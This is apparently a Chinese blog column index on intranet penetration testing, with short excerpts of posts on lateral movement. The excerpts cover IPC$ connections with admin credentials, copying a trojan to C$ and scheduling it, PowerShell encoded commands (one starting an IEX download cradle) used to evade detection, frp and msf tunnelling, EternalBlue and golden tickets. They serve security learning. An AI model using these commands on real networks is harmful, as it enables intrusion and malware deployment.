内网渗透
文章平均质量分 72
学习内网做的总结
kuxing_admin
学会和时间做朋友,时间会慢慢成就你
展开
-
安卓app客户端测试---Drozer使用
https://www.cnblogs.com/lsdb/p/9441813.html原创 2022-10-19 18:25:46 · 1068 阅读 · 0 评论 -
powershell cs-UTF-16LE编码上线
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线1、 例子powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=2、原句子3、UTF-16LE编码后 (在powershell上能直接执行)powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAg原创 2022-07-05 00:20:01 · 657 阅读 · 0 评论 -
sc-计划任务上线木马不成功的原因(但由于任务定义中的限制之一,该任务无法运行)
0x01 前言1\当我们建立完ipc连接shell net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator2、查看连接3、用命令copy 木马过去shell copy C:\phpStudy\PHPTutorial\WWW\public\nw.exe \\192.168.138.138\c$4、用 at \192.168.138.138 16:53:11 c:\1.exe 让域控运行定时任务,5、但等了很久,定时任原创 2022-02-02 12:55:14 · 4477 阅读 · 0 评论 -
内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
0x01 前言当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。初级–》frp代理了解进阶–》多层代理0x02 靶场环境靶场搭建0x03 frp简易配置frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序,下载地址https://github.com/fatedier/frp/releases/tag/v0.38.0一、原创 2022-01-18 15:24:28 · 10487 阅读 · 3 评论 -
内网渗透-如何利用msf把流量代理进内网-隧道搭建
0x01 前言在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。0x02 生成路由msf操作拓扑图如下首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击run autoroute -s ip原创 2022-01-10 14:27:22 · 6818 阅读 · 0 评论 -
window横向渗透-IPC命令&schtasks 计划任务上线
0x01 条件1、我们获取到目标主机管理员账号密码,并且目标主机的 139,445端口是开启的,0x02 建立ipc协议拷贝cs木马这时候, 我们可以先建立ips 协议,net use \ip\ipc$ 密码 /user:账号例子net use \\192.168.93.10\ipc$ zxcASDqw123!! /user:administrator并使用 net use 查看 ipc 连接盘符映射并把目标的c盘挂载到 我们的E 盘上net use z: \ip\c$ “密码” /原创 2022-01-05 17:32:37 · 9765 阅读 · 0 评论 -
黄金票据制作-新手入门
0x01 前言相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户0x02 黄金票据和krbtgt 用户的关系 Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票原创 2021-12-27 16:06:09 · 2316 阅读 · 0 评论 -
内网隧道搭建ksa工具-端对端-无需公网VPS做流量转发
1、前言看雪安全接入(KSA),一款傻瓜式的一键接入私有网络的工具,无论您在任何地点、任何时间、使用任何线路,均可利用这一服务接入自己的私有设备。KSA的服务端和客户端集成在一个可执行文件之中,目前支持Windows、macOS和Linux平台,支持x86/x64、arm(64)和mips(el),树莓派和路由器都可以运行了!2、应用场景你的vps网速过慢,或者没有vps,需要与目标主机搭建一个共同的网关,然后可以互相访问。下载链接Linux客户端下载:KSA_0.80_linux.zipht原创 2021-11-08 12:29:11 · 11792 阅读 · 2 评论 -
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar原创 2021-09-08 20:28:18 · 4723 阅读 · 0 评论 -
网络web渗透工程师-教你怎么喝着茶,把甲方爸爸的活干了。
场景又是一次接外包项目去甲方做渗透的一天,到了现场,发现甲方爸爸的是一家国企,国企的服务器搭建,普遍比较乱,不出所料,第一天去现场,我还以为是他们给资产,我们渗透就行了,结果发现,我们连那个资产对应那个国企的二级部门都不知道。唯一比较全的,就是各部门的资产表,然后刚开始让我们梳理资产。可使用工具D01设备:一个可以进行资产扫描的漏扫,能说明c段的常用端口,并测试端口漏洞。一台垃圾的联想电脑:什么工具都能安装。...原创 2021-03-10 00:02:06 · 551 阅读 · 0 评论